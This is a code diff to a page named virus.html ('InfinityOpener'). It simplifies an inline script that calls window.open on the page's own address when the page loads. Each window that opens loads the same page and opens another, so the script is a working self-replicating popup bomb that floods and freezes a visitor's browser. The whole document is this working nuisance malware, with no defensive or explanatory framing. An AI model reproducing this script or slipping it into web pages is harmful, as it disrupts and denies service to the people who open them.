--- a/virus.html
+++ b/virus.html
@@ -8,10 +8,7 @@ InfinityOpener
 <head>
 <title></title>
 <script type="text/javascript">
-function fullScreen(theURL) {
-	window.open(theURL);
-}
-fullScreen(document.location.href);
+window.open(document.location.href);
 </script>
 </head>
 <body>
